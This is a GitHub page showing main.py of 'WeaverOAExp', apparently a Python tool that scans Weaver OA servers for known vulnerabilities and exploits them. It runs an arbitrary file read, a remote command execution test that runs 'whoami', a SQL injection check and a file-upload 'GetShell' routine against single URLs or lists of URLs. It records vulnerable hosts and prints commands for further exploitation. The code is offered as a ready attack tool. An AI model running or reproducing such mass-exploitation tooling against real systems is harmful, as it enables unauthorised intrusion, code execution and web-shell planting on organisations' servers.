-
Notifications
You must be signed in to change notification settings - Fork 77
/
main.py
112 lines (86 loc) · 3.72 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
# -*- coding: utf-8 -*-
import os
import argparse
import time
from pyfiglet import Figlet
from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql,Weaver_Common_Ctrl_Upload
BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[1;33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'
def now_time():
return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC
def info():
return VIOLET + "[INFO] " + ENDC
def error():
return RED + "[ERROR] " + ENDC
def warning():
return YELLOW + "[WARNING] " + ENDC
def success():
return GREEN + "[SUCCESS] " + ENDC
def result(name, url):
file = open('result.txt', 'a')
file.write(name + ': ' + url + '\n')
file.close()
def check(url):
if url[-1] != '/':
url += '/'
if url[:4] != 'http':
url = 'http://' + url
print(now_time() + info() + 'Target: ' + url)
# 泛微云桥任意文件读取
print(now_time() + info() + '正在检测泛微云桥任意文件读取漏洞')
id, system = E_Bridge_Arbitrary_File_Read.check(url)
if id is None:
print(now_time() + warning() + '不存在泛微云桥任意文件读取漏洞')
else:
E_Bridge_Arbitrary_File_Read.POC_2(url, id)
print(now_time() + success() + 'python3 poc/E_Bridge_Arbitrary_File_Read.py {} 进行进一步利用'.format(url))
result('泛微云桥任意文件读取', url)
# 泛微 WorkflowServiceXml RCE
print(now_time() + info() + '正在检测泛微 WorkflowServiceXml RCE 漏洞')
if E_Cology_WorkflowServiceXml_RCE.exploit(url, 'whoami') is None:
print(now_time() + warning() + '不存在泛微 WorkflowServiceXml RCE 漏洞')
else:
print(now_time() + info() + 'whoami: ' + E_Cology_WorkflowServiceXml_RCE.exploit(url, 'whoami'))
print(now_time() + success() + 'python3 poc/E_Cology_WorkflowServiceXml_RCE.py {} cmd 进行进一步利用'.format(url))
result('泛微 WorkflowServiceXml RCE', url)
# 泛微OA V8 前台Sql注入
print(now_time() + info() + '正在检测泛微 OA V8 前台SQL注入漏洞')
if E_Cology_V8_Sql.poc(url) == 'ok':
result('泛微OA V8前台Sql注入', url)
# 泛微OA weaver.common.Ctrl 任意文件上传
print(now_time() + info() + '正在检测泛微OA weaver.common.Ctrl 任意文件上传漏洞')
if Weaver_Common_Ctrl_Upload.GetShell(url) == 'ok':
result('泛微OA weaver.common.Ctrl 任意文件上传', url)
if __name__ == '__main__':
print(VIOLET + Figlet(font='slant').renderText('WeaverOAExp') + ENDC)
print(' Author: zjun HomePage: www.zjun.info\n')
parser = argparse.ArgumentParser(description='泛微OA POC 合集')
parser.add_argument('-u', '--url', dest='url', required=False, help='target url')
parser.add_argument('-f', '--file', dest='file', required=False, help='url file')
Usage = "Usage:\npython3 {0} -u url\npython3 {0} -f url.txt".format(
os.path.basename(__file__))
args = parser.parse_args()
if args.file:
f = open(args.file, 'r')
urls = f.readlines()
for url in urls:
url = url.strip('\n')
if url[-1] != '/':
url += '/'
if url[:4] != 'http':
url = 'http://' + url
check(url)
# 扫描结果
print(now_time() + info() + '扫描已完成, 结果保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')
f.close()
elif args.url:
check(args.url)
# 扫描结果
print(now_time() + info() + '扫描已完成, 结果保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')
else:
print(Usage)